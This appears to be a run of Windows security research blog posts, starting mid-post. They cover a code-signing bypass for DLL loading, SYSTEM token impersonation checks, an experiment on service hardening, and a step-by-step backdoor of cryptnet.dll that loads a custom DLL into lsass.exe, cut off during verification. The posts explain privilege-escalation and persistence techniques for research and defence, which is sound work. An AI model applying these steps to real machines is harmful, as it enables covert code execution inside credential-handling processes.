Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;


If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;


The code is using a the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to use the kernel's Code Integrity module to checking the signing level. The signing level must be at least level 8, passing in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know, using a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.

The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N)

By: tiraniddo
30 January 2020 at 06:40
This is just a quick follow on from my last post on Windows Service Hardening. I'm going to pick up on why you shouldn't use a SYSTEM token for a sandbox token. Specifically I'll describe an unexpected behavior when you mix the SYSTEM user and SeImpersonatePrivilege, or more specifically if you remove SeImpersonatePrivilege.

As I mentioned in the last post it's possible to configure services with a limited set of privileges. For example you can have a service where you're only granted SeTimeZonePrivilege and every other default privilege is removed. Interestingly you can do this for any service running as SYSTEM. We can check what services are configured without SeImpersonatePrivilege with the following PS.

PS> Get-RunningService -IncludeNonActive | ? { $_.UserName -eq "LocalSystem" -and $_.RequiredPrivileges.Count -gt 0 -and "SeImpersonatePrivilege" -notin $_.RequiredPrivileges } 

On my machine that lists 22 services which are super secure and don't have SeImpersonatePrivilege configured. Of course the SYSTEM user is so powerful that surely it doesn't matter whether they have SeImpersonatePrivilege or not. You'd be right but it might surprise you to learn that for the most part SYSTEM doesn't need SeImpersonatePrivilege to impersonate (almost) any user on the computer.

Let's see a diagram for the checks to determine if you're allowed to impersonate a Token. You might know it if you've seen any of my presentations, or read part 3 of Reading Your Way Around UAC.

Impersonation FlowChat. Showing that there's an Origin Session Check.

Actually this diagram isn't exactly like I've shown before I changed one of the boxes. Between the IL check and the User check I've added a box for "Origin Session Check". I've never bothered to put this in before as it didn't seem that important in the grand scheme. In the kernel call SeTokenCanImpersonate the check looks basically like:

if (proctoken->AuthenticationId == 
    imptoken->OriginatingLogonSession) {

The check is therefore, if the current Process Token's Authentication ID matches the Impersonation Token's OriginatingLogonSession ID then allow impersonation. Where is OriginatingLogonSession coming from? The value is set when an API such as LogonUser is used, and is set to the Authentication ID of the Token calling the API. This check allows a user to get back a Token and impersonate it even if it's a different user which would normally be blocked by the user check. Now what Token authenticates all new users? SYSTEM does, therefore almost every Token on the system has an OriginatingLogonSession value set to the Authentication ID of the SYSTEM user.

Not convinced? We can test it from an admin PS shell. First create a SYSTEM PS shell from an Administrator PS shell using:

PS> Start-Win32ChildProcess powershell

Now in the SYSTEM PS shell check the current Token's Authentication ID (yes I know Pseduo is a typo ;-)).

PS> $(Get-NtToken -Pseduo).AuthenticationId

LowPart HighPart
------- --------
    999        0

Next remove SeImpersonatePrivilege from the Token:

PS> Remove-NtTokenPrivilege SeImpersonatePrivilege

Now pick a normal user token, say from Explorer and dump the Origin.

PS> $p = Get-NtProcess -Name explorer.exe
PS> $t = Get-NtToken -Process $p -Duplicate
PS> $t.Origin

LowPart HighPart
------- --------
    999        0

As we can see the Origin matches the SYSTEM Authentication ID. Now try and impersonate the Token and check what the resultant impersonation level assigned was:

PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}

We can see the final line shows the impersonation level as Impersonation. If we'd been blocked impersonating the Token it'd be set to Identification level instead.

If you think I've made a mistake we can force failure by trying to impersonate a SYSTEM token but at a higher IL. Run the following to duplicate a copy of the current token, reduce IL to High then test the impersonation level.

PS> $t = Get-NtToken -Duplicate
PS> Set-NtTokenIntegrityLevel High
PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}

As we can see, the level has been set to Identification. If SeImpersonatePrivilege was being granted we'd have been able to impersonate the higher IL token as the privilege check is before the IL check.

Is this ever useful? One place it might come in handy is if someone tries to sandbox the SYSTEM user in some way. As long as you meet all the requirements up to the Origin Session Check, especially IL, then you can still impersonate other users even if that's been stripped away. This should work even in AppContainers or Restricted as the check for sandbox tokens happens after the session check.

The take away from this blog should be:

  • Removing SeImpersonatePrivilege from SYSTEM services is basically pointless.
  • Never try create a sandboxed process which uses SYSTEM as the base token as you can probably circumvent all manner of security checks including impersonation.

Empirically Assessing Windows Service Hardening

By: tiraniddo
2 January 2020 at 02:26
In the past few years there's been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege. What this means is given access to a suitable token handle of an administrator (say through the Rotten Potato attack) you can impersonate and elevate from a lower-privileged service account to SYSTEM. The problem for discovers of these attacks is that Microsoft do not consider them something which needs to be fixed with a security bulletin, as having SeImpersonatePrivilege is basically a massive security hole. However MS go and fix them silently making it unclear if they care or not.

Of course, none of this is really new, Cesar Cerrudo detailed these sorts of service attacks in Token Kidnapping and Token Kidnapping's Revenge. The novel element recently is how to get hold of the access token, for example via negotiating local NTLM authentication. Microsoft seem to have been fighting this fire for almost 10 years and still have not gotten it right. In shades of UAC, a significant security push to make services more isolated and secure has been basically abandoned because (presumably) MS realized it was an indefensible boundary.

That's not to say there hasn't been interesting service account to SYSTEM bugs which Microsoft have fixed. The most recent example is CVE-2019-1322 which was independently discovered by multiple parties (DonkeysTeamIlias Dimopoulos and Edward Torkington/Phillip Langlois of NCC). To understand the bug you probably should read up one of the write-ups (NCC one here) but the gist is, the Update Orchestrator Service has a service security descriptor which allowed "NT AUTHORITY\SERVICE" full access. It so happens that all system services, including lower-privileged ones have this group and so you could reconfigure the service (which was running as SYSTEM) to point to any other binary giving a direct service to SYSTEM privilege escalation.

That begs the question, why was CVE-2019-1322 special enough to be fixed and not issues related to impersonation? Perhaps it's because this issue didn't rely on impersonate privileges being present? It is possible to configure services to not have impersonate privilege, so presumably if you could go from a non-impersonate service to an impersonate service that would count as a boundary? Again probably not, for example this bug which abuses the scheduled task service to regain impersonate privilege wouldn't likely be fixed by Microsoft.

That lack of clarity is why I tweeted to Nate Warfield and ultimately to Matt Miller asking for some advice with respect to the MSRC Security Servicing Guidelines. The result is, even if the service doesn't have impersonate privilege it wouldn't be a defended boundary if all you get is the same user with additional privileges as you can't block yourself from compromising yourself. This is the UAC argument over again, but IMO there's a crucial difference, Windows Service Hardening (WSH) was supposed to fix this problem for us in Vista. Unsurprisingly Cesar Cerrudo also did a presentation about this at the inaugural (maybe?) Infiltrate in 2011.

The question I had was, is WSH still as broken as it was in 2011? Has anything changed which made WSH finally live up to its goal of making a service compromise not equal to a full system compromise? To determine that I thought I'd run an experiment on Windows 10 1909. I'm only interested in the features which WSH touches which led me to the following hypothesis:

"Under Windows Service Hardening one service without impersonate privilege can't write to the resources of another service which does have the privilege, even if the same user, preventing full system compromise."

The hypothesis makes the assumption that if you can write to another service's resources then it's possible to compromise that other service. If that other service has SeImpersonatePrivilege then that inevitably leads to full system compromise. Of course that's not necessarily the case, the resource being written to might be uninteresting, however as a proxy this is sufficient as the goal of WSH is to prevent one service modifying the data of another even though they are the same underlying user.

WSH Details

Before going into more depth on the experiment, let's quickly go through the various features of WSH and how they're expressed. If you know all this you can skip to the description of the experiment and the results.

Limited Service Accounts and Reduced Privilege

This feature is by far the oldest attempt to harden services, the introduction of the LOCAL SERVICE (LS) and NETWORK SERVICE (NS) accounts. Prior to the accounts introduction there was only two ways of configuring the user for a system service on Windows, either the fully privileged SYSTEM account or creating a local/domain user which has the "Log on as a Service" right. The two accounts where introduced in XP SP2 (I believe) after worms such as Blaster basically got SYSTEM privilege through remotely attacking exposed services. The two service accounts are not administrator accounts which means they shouldn't be able to directly compromise the system. The accounts are very similar on Windows 10 1909, they are both assigned the following groups*:

NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization

* Technically this isn't 100% accurate, on my machine the LS account has some extra capability groups, but we'll ignore those for this blog post.

No Administrator group in sight. Each service token gets a unique Logon Session ID SID which will be important later. The service accounts also have a limited set of privileges, as shown below:


† NETWORK SERVICE doesn't have SeSystemTimePrivilege.

The two privileges I've highlighted, SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege give these accounts effectively full system access when combined with a suitable privileged token. Part of WSH is also giving control over what privileges the service account actually requires. The default is to allow all privileges, however when configuring a service you can specify a list of privileges to restrict the service to. For example the CDPSvc service is configured to only require SeImpersonatePrivilege. Quite why they bother to put this restriction on the service I don't know ¯\_(ツ)_/¯.

What's the difference between LS and NS? The primary difference is LS has no network credentials, so accessing network resources as that user would only succeed as an anonymous login. NS on the other hand is created with the credentials of the computer account and so can interact with the network for resources allowed by that authentication. This only really matters to domain joined machines, standalone machines would not share the computer account with anyone else.

Per-Service SID

The first big addition in WSH was the Per-Service SID. This SID is automatically added to the group list of default groups shown previously by the SCM when creating the service's primary token. The service SID is also added with the SE_GROUP_OWNER flag set and is not mandatory, which means it can be set as the token's default owner when creating new resources and it can disabled. The basic idea is a service can ACL its resources to this SID to prevent other services from accessing them. The use of a service SID is optional, but the majority of default services are configured to use it. An example SID for CDPSvc is as follows:


The SID is derived by generating a SHA1 hash of the service name and adding that as the SID's RIDs (with an extra 80 at the start to signify it's a service SID). The use of a hash should make it extremely unlikely two services would generate the same SID.

Of course it's up to the service to actually ACL their resources appropriately. To aid in that the token's default DACL is also configured to the following (for CDPSvc):

- Type  : Allowed
- Access: Full Access

- Type  : Allowed
- Access: ReadControl

- Type  : Allowed
- Access: Full Access

The three entries grant SYSTEM and the service SID full access to any resources with this DACL. It then limits the owner of the resource through OWNER RIGHTS to only READ_CONTROL access. This directly prevents one service account accessing the resources of another for write access. Unfortunately the default DACL is only applied when there's no other access control specified, either explicitly at creation time or due to inheritance. 

One other thing to point out is that Windows still has shared services through the use of SVCHOST. If multiple services are registered in a specific SVCHOST instance then the SCM will create the token with all service SIDs in the group list and default DACL even if a service isn't currently loaded in the host. That has become less of an issue since Windows 1703, as long as you have greater that 3.5GB of RAM services will run in separate SVCHOST instances and all services will be totally separate.

Write-Restricted Token

The second big addition to WSH was the concept of Write-Restricted (WR) tokens. Restricted token's have existed since Windows 2000 and are created using the NtFilterToken system call. The basic concept is the token can have a list of additional groups which are consulted when ever an access check is performed. First the access check is run on the default group list, if access would be granted the access check is run again on the restricted SIDs. If the second check is successful then the access check passes, if not access is denied. 

Restricted tokens are used for sandboxing (such as in Chrome) but are difficult to setup correctly as it blocks all access equally including reading critical files on disk. WR tokens solve the access problem by only blocking write access but leaving read and execute access alone. 

In order for a service configured as WR to write to a resource the associated security descriptor must contain the required access for one of the following restricted SIDs.


The WRITE RESTRICTED SID is a special group SID which resources can apply if they expect a service to write to the resource. This SID is also added to the token's groups by the SCM so that it can be used to pass both checks. By combining service SIDs and WR the amount of resources a service can modify should be significantly reduced.

And the Rest

There's a few things which are technically part of service hardening which won't really consider for the experiment:

The main one is additional rules in the firewall to block network services or requests being made from a service. This is arguably more to prevent remote compromise than it is to prevent cross-service attacks. 

Another is Session 0 Isolation and System Integrity Level. Session 0 Isolation was introduced to prevent Shatter Attacks, by preventing any windows being created by a service on the same desktop as a normal user. System Integrity Level through UIPI then prevents attacks even if the service did create a window on a normal user desktop as it'd be at a much higher IL (even than Administrators). The System IL does admittedly also have a security access check function but it's not that important for cross-service attacks.

Experiment Procedure

On to the experiment itself. Based on the hypothesis I presented earlier the goal is to determine if you can write to resources of one service from another service even though they're the same user. To make this testable I decided on the following procedure:

Step 1: Build an access token for a service which doesn't exist on the system.
Step 2: Enumerate all resources of a specific type which are owned by the token owner and perform an access check using the token.
Step 3: Collate the results based on the type of resource and whether write access was granted.

The reason for choosing to build a token for a non-existent service is it ensures we should only see the resources that could be shared by other services as the same user, not any resources which are actually designed to be accessible by being created by a service. These steps need to be repeated for different access tokens, we'll use the following five:
  • LOCAL SERVICE, Write Restricted
  • NETWORK SERVICE, Write Restricted
  • Control
We'll test both normal service SID and WR versions of the access token to see if it makes much of a difference. One thing to determine is what to use as a control. Ideally the control would be another service account with WSH disabled. However I couldn't find a way to disable WSH entirely to do this test, so instead we need some other control. If our hypothesis holds and WSH is effective we'd expect no resources to be writable, therefore we need to pick a control account where we know this is not true. The easiest is just to use the current logged on user account, it should be able to access almost all its own resources.

What resources do we want to inspect? The obvious type is Process/Thread resources. Getting write access to either of these in another service is probably a trivial to get full system compromise through impersonate. We'd want to get a bigger picture however, it'd be useful to include Files, Registry keys and Named Kernel Objects. These resources might not directly lead to compromise but it does give us a general idea of the maximum impact. 

It's worth noting that the hypothesis made a point to specify writing to the resources of a service which has impersonate privilege from one which does not. However this experimental process will only base the analysis on whether the resource is owned by the service user. This is intentional, it'd be too complex to attribute the resource to a specific service in all cases. However an assumption is made that more services running as a specific user have impersonate privilege than do not, therefore in all probability any resource you can write to is probably owned by one of them. We could verify that assumption if we liked, but I'll probably not.

Finally, a good experiment should be something which can be repeatable and verifiable. To that end I'll provide all the code necessary to perform the steps, written in PowerShell and using my NtObjectManager module. If you want to re-run the experiment you should be able to do so and produce a very similar set of results.

Experiment Procedure Detail

On to specific PowerShell steps to perform the experiment. First off you'll need my NtObjectManager module, specifically at least version 1.1.25 as I've added a few extra commands to simplify the process. You will also need to run all the commands as the SYSTEM user, some command will need it (such as getting access tokens) others benefit for the elevated privileges. From an admin command prompt you can create a SYSTEM PowerShell console using the following command:

Start-Win32ChildProcess -RequiredPrivilege SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege powershell

This command will find a SYSTEM process to create the new process from which also has, at a minimum, the specified list of privileges. Due to the way the process is created it'll also have full access to the current desktop so you can spawn GUI applications running at system if you need them.

The experiment will be run on a VM of Windows 1909 Enterprise updated to December 2019 from a split-token admin user account. This just ensures the minimum amount of configuration changes and additional software is present. Of course there's going to be variability on the number of services running at any one time, there's not a lot which can be done about that. However it's expected that the result should be same even if the individual resources available are not. If you were concerned you could rerun the experiment on multiple different installs of Windows at different times of day and aggregate the results.

Creating the Access Tokens

We need to create 5 access tokens for the test. Ideally we'd like to create the four service tokens using the exact method used by the SCM. We could register our unknown service and start the service to steal its token. There is also an undocumented RGetServiceProcessToken SCM RPC method in newer versions of Windows 10. However I think creating a service risks some resources being populated with that service's identity which might not be what we really want. Instead we can use LogonUserExExW which is what the SCM uses, with the LOGON32_LOGON_SERVICE type to create LS and NS tokens. This will work as long as we have SeTcbPrivilege. We'll then just add the appropriate groups, convert to WR,  and remove privileges as necessary. We can get to the LogonUserExExW API using Get-NtToken. I've wrapped up everything into a function Get-ServiceToken, you can see the full function in the final script. Using this function we can create all the tokens we need using the following commands:

$tokens = @()
$tokens += Get-ServiceToken LocalService FakeService
$tokens += Get-ServiceToken LocalService FakeService -WriteRestricted
$tokens += Get-ServiceToken NetworkService FakeService
$tokens += Get-ServiceToken NetworkService FakeService -WriteRestricted

For the control token we'll get the unmodified session access token for the current desktop. Even though we're running as SYSTEM as we're running on the same desktop we can just use the following command:

$tokens += Get-NtToken -Session -Duplicate

Random note. When calling LogonUserExExW and requesting a service SID as an additional group the call will fail with access denied. However this only happens if the service SID is the first NT Authority SID in the additional groups list. Putting any other NT Authority SID, including our new logon session SID before the service SID makes it work. Looking at the code in LSASRV (possibly the function LsapCheckVirtualAccountRestriction) it looks like the use of a service SID should be restricted to the first process (based on its PID) that used a service SID which would be the SCM. However if another NT Authority SID is placed first the checking loop sets a boolean flag which prevents the loop checking any more SIDs and so the service SID is ignored. I've no idea if this is a bug or not, however as you need TCB privilege to set the additional groups I don't think it's a security issue.

Resource Checking and Result Collation

With the 5 tokens in hand we can progress to assessing accessible resources. The original purpose of my Sandbox Analysis tools was finding accessible resources from a sandbox process, however the same code is capable of finding resources accessible from any access token, including service tokens.

First as way of example lets run checks for process and threads:

$ps = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ProcessOnly -AllowEmptyAccess
$ts = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ThreadOnly -AllowEmptyAccess

We can pass a list of tokens to the checking command, this improves performance as we only do the enumeration of resources for every token group then do the access check. Each generated access result has a TokenId property which indicates the unique ID of the token which was used for the check, this allows us to extract the correct results later. We also specify the AllowEmptyAccess option, which will generate a result even if the access check fails and the token has no access to the resource. This will be useful to allow us to assess what resources are owned by the token's owner SID but we were not granted access.

Let's do the rest of the resources:

$os = Get-AccessibleObject \ -Recurse `
    -Tokens $tokens -AllowEmptyAccess
$fs = Get-AccessibleFile -Win32Path "$env:SystemDrive\" `
    -FormatWin32Path -Recurse -Tokens $tokens -AllowEmptyAccess
$ks = Get-AccessibleKey \Registry -FormatWin32Path -Recurse `
    -Tokens $tokens -AllowEmptyAccess

We'll only get the accessible files on the system drive in this case as that'll be the only drive in the VM. Note that Get-AccessibleObject doesn't check ALPC ports, it's not possible to open an ALPC port by name and read its security descriptor. We'll ignore ALPC ports for this experiment, as it's probably worthy of a topic all on its own.

We now have all the results we need in five variables along with the tokens. If you want to run it yourself the final script is on Github here. It'll take a fair amount of time to run but once it's complete you'll find 5 CSV files in the current directory containing the results for each token.

Experiment Results

We now need to do our basic analysis of the results. Let's start with calculating the percentage of writable resources for each token type relative to the total number of resources. From my single experiment run I got the following table:

TokenWritableWritable (WR)Total
Network Service65.00%0.00%300
Local Service62.89%0.70%574

As we expected the control token had almost 100% of the owned resources writable by the user.  However for the two service accounts both had over 60% of their owned resources writable when using an unrestricted token. That level is almost completely eliminated when using a WR token, there were no writable resources for NS and only 4 resources writable from LS, which was less than 1%. Those 4 resources were just Events, from a service perspective not very exciting though there were ACL'ed to everyone which is unusual.

Just based on these numbers alone it would seem that WSH really is a failure when used unrestricted but is probably fine when used in WR mode. It'd be interesting to dig into what types are writable in the unrestricted mode to get a better understanding of where WSH is failing. This is what I've summarized in the following table:

TypeLS Writable%LS WritableNS Writable%NS Writable

The clear winners, if there is such a thing is Files and Registry Keys taking up over 95% of the resources which are writable. Based on what we know about how WSH works this is understandable. The likelihood is any keys/files are getting their security through inheritance from the parent container. This will typically result in at least the owner field being the service account granted WRITE_DAC access, or the inherited DACL will contain an OWNER CREATOR SID which results an explicit access for the service account.

What is perhaps more interesting is the results for Processes and Threads, neither NS or LS have any writable threads and only LS has a single writable process. This primary reason for the lack of writable threads and processes is due to the default DACL which is used for new processes when an explicit DACL isn't specified. The DACL has a OWNER RIGHTS SID granted only READ_CONTROL access, the result is that even if the owner of the resource is the service account it isn't possible to write to it. The only way to get full access as per the default DACL is by having the specific service SID in your group list.

Why does LS have one writable process? This I think is probably a "bug" in the Audio Service which creates the AUDIODG process. If we look at the security descriptor of the AUDIODG process we see the following:


 - Type  : Allowed
 - Name  : NT SERVICE\Audiosrv
 - Access: Full Access

 - Type  : Allowed
 - Name  : NT AUTHORITY\Authenticated Users
 - Access: QueryLimitedInformation

The owner is LS which will grant WRITE_DAC access to the resource if nothing else is in the DACL to stop it. However the default DACL's OWNER RIGHTS SID is missing from the DACL, which means this was probably set explicitly by the Audio Service to grant Authenticated Users query access. This results in the access not being correctly restricted from other service accounts. Of course AUDIODG has SeImpersonatePrivilege so if you find yourself inside a LS unrestricted process with no impersonate privilege you can open AUDIODG (if running) for WRITE_DAC, change the DACL to grant full access and get back impersonate privileges.

If you look at the results one other odd thing you'll notice is that while there are readable threads there are no readable processes, what's going on? If we look at a normal LS service process' security descriptor we see the following:

 - Name  : NT AUTHORITY\LogonSessionId_0_202349

 - Type  : Allowed
 - Name  : NT AUTHORITY\LogonSessionId_0_202349
 - Access: Full Access

 - Type  : Allowed
 - Name  : BUILTIN\Administrators
 - Access: QueryInformation|QueryLimitedInformation

We should be able to see the reason, the owner is not LS, but instead the logon session SID which is unique per-service. This blocks other LS processes from having any access rights by default. Then the DACL only grants full access to the logon session SID, even administrators are apparently not the be trusted (though they can typically just bypass this using SeDebugPrivilege). This security descriptor is almost certainly set explicitly by the SCM when creating the process.

Is there anything else interesting in writable resources outside of the files and keys? The one interesting result shared between NS and LS is a single writable Object Directory. We can take a look at the results to find out what directories these are, to see if they share any common purpose. The directory paths are \Sessions\0\DosDevices\00000000-000003e4 for NS and \Sessions\0\DosDevices\00000000-000003e5 for LS. These are the service account's DOS Device directory, the default location to start looking up drive mappings. As the accounts can write to their respective directory this gives another angle of attack, you can compromise any service process running as the same used by dropping a mapping for the C: drive and waiting the process to load a DLL. Leaving that angle open seems sloppy, but it's not like there are no alternative routes to compromise another service.

I think that's the limit of my interest in analysis. I've put my results up on Google Drive here if you want to play around yourself.


Even though I've not run the experiment on multiple machines, at different times with different software I think I can conclude that WSH does not provide any meaningful security boundary when used in its default unrestricted mode. Based on the original hypothesis we can clearly write to resources not created by a service and therefore could likely fully compromise the system. The implementation does do a good job of securing process and thread resources which provide trivial elevation routes but that can be easily compromised if there's appropriate processes running (including some COM services). I can fully support this not being something MS would want to defend through issuing bulletins.

However when used in WR mode WSH is much more comprehensive. I'd argue that as long as a service doesn't have impersonate privilege then it's effectively sandboxed if running in with a WR token. MS already support sandbox escapes as a defended boundary so I'm not sure why WR sandboxes shouldn't also be included as part of that. For example if the trick using the Task Scheduler worked from a WR service I'd see that as circumventing a security boundary, however I don't work in MSRC so I have no influence on what is or is not fixed.

Of course in an ideal world you wouldn't use shared accounts at all. Versions of Windows since 7 have support for Virtual Service Accounts where the service user is the service SID rather than a standard service account and the SCM even limits the service's IL to High rather than System. Of course by default these accounts still have impersonate privilege, however you could also remove that.

PE Import Table hijacking as a way of achieving persistence - or exploiting DLL side loading

27 December 2019 at 03:56


In this post I describe a simple trick I came up with recently - something which is definitely nothing new, but as I found it useful and haven't seen it elsewhere, I decided to write it up.

What we want to achieve

So - let's consider backdooring a Windows executable with our own code by modifying its binary file OR one of its dependencies (so we are not talking about runtime code injection techniques or hooking,  neither about abusing known persistence features like AppInit DLLs and the like).

Most of us are familiar with execution flow hijacking combined with:

We probably heard of IAT hooking (in-memory), but how about on-disk?

Import Table and DLL loading

Both EXE and DLL files make use of a PE structure called Import Table, which is basically a list of external functions (usually just WinAPI) the program is using, along with the names of the DLL files they are located in. This list can be easily reviewed with any PE analysis/editing tool like LordPE, PEView, PEStudio, PEBear and so on:

An excerpt of the calc.exe Import table displayed in PEView

These are the runtime dependencies resolved by the Windows PE loader upon image execution, making the new process call LoadLibrary()  on each of those DLL files. Then the relevant entries for each individual function are replaced with with its current address within the just-loaded library (the GetProcAddress() lookup) - this is the normal and usual way of having this done, taken care by the linker during build and then by the Windows loader using the Import Table.

I need to mention that the process can as well be performed directly by the program (instead of using the Import Table), by calling both LoadLibrary() and then GetProcAddress(), respectively from its own code at some point (everyone who wrote a windows shellcode knows this :D). This second way of loading DLLs and calling functions from them is sometimes referred to as dynamic linking (e.g. required for calling native APIs) and in many cases is a suspicious indicator (often seen in malicious software).

Anyway, let's focus on the Import Table and how we can abuse it.

Getting right to it - hijacking the Import Table and creating the malicious PoC DLL

WARNING: Please avoid experimenting with this on a production system before you develop and test a working PoC, especially when dealing with native Windows DLLs (you could break your system, you've been warned). Do it on a VM after making a backup snapshot first.

So, without any further ado, let's say that for some reason (🤭) we would like to inject our code into lsass.exe.

Let's start with having a procmon look to see what DLLs does lsass.exe load:

A procmon filter for DLL loads performed by lsass.exe
The results once the filter is applied

Now, we are going to slightly modify one of these DLLs.

When choosing, preferably we should go after one that is not signed (as we want to chose one with high chances of being loaded after our modification).

But in this case, to my knowledge, they are all signed (some with embedded signatures - with the Digital Signatures tab visible in the explorer properties of the file, others signed in the C:\Windows\System32\catroot\).

The execution policy on this system, however, is unrestricted... oh wait, that's what I thought up until finishing up this write up, but then for diligence, I decided to actually make a screenshot (after seeing it I was surprised it worked, please feel free to try this at home):

ANYWAY - WE WANT to see what happens OURSELVES - instead of making self-limiting assumptions, so we won't let the presence of the signature deteriorate us. Also, in case system decides that integrity is more critical than availability and decides to break, we have a snapshot of the PoC development VM.

The second factor worth considering when choosing the target DLL is the presence of an Import Table entry we would feel convenient replacing (will become self-explanatory).

So, let's choose C:\Windows\System32\cryptnet.dll (sha256: 723563F8BB4D7FAFF5C1B202902866F8A0982B14E09E5E636EBAF2FA9B9100FE):

Now, let's view its Import Table and see if there is an import entry, which is most likely not used - at least during normal operations. Therefore such an entry is the most safe to replace (I guess now you see where this is going). We could as well ADD an import table entry, but this is a bit more difficult, introduces more changes into the target DLL and is beyond this particular blog post.

Here we go:

api-ms-win-core-debug-l1-1-0.dll with its OutputDebugStringA is a perfect candidate.

As Import Tables contain only one reference to each particular DLL name, all relevant functions listed in the Import Table simply refer to such DLL name within the table.

Hence, if we replace a DLL that has multiple function entries in the Import Table, we would have multiple functions to either proxy or lose functionality and risk breaking something (depending on how lazy we are).

Thus, a DLL from which only one function is imported is a good candidate. If the DLL+function is a dependency that has most likely already been resolved by the original executable before it loaded the DLL we are modifying, it's even better. If it is a function that is most likely not to be called during normal operations (like debugging-related functions), it's perfect.

Now, let's work on a copy of the target DLL and apply a super l33t offensive binary hacking technique - hex editor. First, let's find the DLL name (we simply won't care about the Import Table structure):

Searching for the DLL name in the Import Table using HxD

Got it, looks good:

Looks like we found it

Now, our slight modification:

Now, just changing ONE byte, that's all we need

So now our api-ms-win-core-debug-l1-1-0.dll became api-ms-win-code-debug-l1-1-0.dll.

Let's confirm the Import Table change in PEView:

Now, let's fire up our favorite software development tool and create api-ms-win-code-debug-l1-1-0.dll with our arbitrary code.

DevC++, new project, DLL, C

Using a very simple demo, grabbing the current module name (the executable that loaded the DLL) and its command line, appending it into a txt file directly on C: (so by default only high integrity/SYSTEM processes will succeed):

One thing, though - in order for the GetModuleFileNameA() function from the psapi library (psapi.h) to properly link after compilation, -lpsapi needs to be added to the linker parameters:

Code can be copied from here

OK, compile. Now, notice we used one export, called OutputFebugString (instead of OutputDebugString). This is because the linker would complain about the name conflict with the original OutputDebugString function that will get resolved anyway through other dependencies.

But since I wanted to have the Export Table in the api-ms-win-code-debug-l1-1-0.dll to match the entry from the cryptnet.dll Import Table, I edited it with HxD as well:

Fixing it


Fixing it

Normally we might want to test the DLL with rundll32.exe (but I am going to skip this part). Also, be careful when using VisualStudio, as it might produce an executable that by default will be x86 (and not x64) and for sure will produce an executable requiring visual C++ redistributables (even for a basic hello world-class application like this), while we might want to create portable code that will actually run on the target system.

What we are expecting to happen

We are expecting the lsass.exe process (and any other process that imports anything from cryptnet.dll) to load its tampered (by one byte!) version from its original location in spite of its digital signature being no longer valid (but again, lsass.exe and cryptnet.dll are just examples here).

We are also expecting that, once loaded, cryptnet.dll will resolve its own dependencies, including our phony api-ms-win-code-debug-l1-1-0.dll, which in turn, upon load (DllMain() execution) will execute our arbitrary code from within lsass.exe process (as well as from any other process that loads it, separately) and append our C:\poc.txt file with its image path and command line to prove successful injection into that process.


OK, now we just need to deploy our version of cryptnet.dll (with the one Import Table entry hijacked with our phony api-ms-win-code-debug-l1-1-0.dll) along with our phony api-ms-win-code-debug-l1-1-0.dll itself into C:\Windows\System32\.

For this, obviously, we need elevated privileges (high integrity administrator/SYSTEM).

Even then, however, in this case we will face two problems (both specific to C:\Windows\System32\cryptnet.dll).

The first one is that C:\Windows\System32\cryptnet.dll is owned by TrustedInstaller and we (assuming we are not TrustedInstaller) do not have write/full control permissions for this file:

The easiest way to overcome this is to change the file ownership and then grant privileges:

The second problem we will most likely encounter is that the C:\Windows\System32\cryptnet.dll file is currently in use (loaded by multiple processes).

The easiest workaround for this is to first rename the currently used file:

Then deploy the new one (with hijacked Import Table), named the same as the original one (cryptnet.dll).

Below screenshot shows both new files deployed after having the original one renamed:


Now, for diagnostics, let's set up procmon by using its cool feature - boot logging. Its driver will log events from the early stage of the system start process, instead of waiting for us to log in and run it manually. That boot log itself is, by the way, a great read:

Once we click Enable Boot Logging, we should see the following prompt:

We simply click OK.


And let's check the results.

This looks encouraging:

Oh yeah:

Let's run procmon to filter through the boot log. Upon running we should be asked for saving and loading the boot log, we click Yes:

Now, the previous filter (Process name is lsass.exe and Operation is Load Image) confirms that our phony DLL was loaded right after cryptnet.dll:

One more filter adjustment:

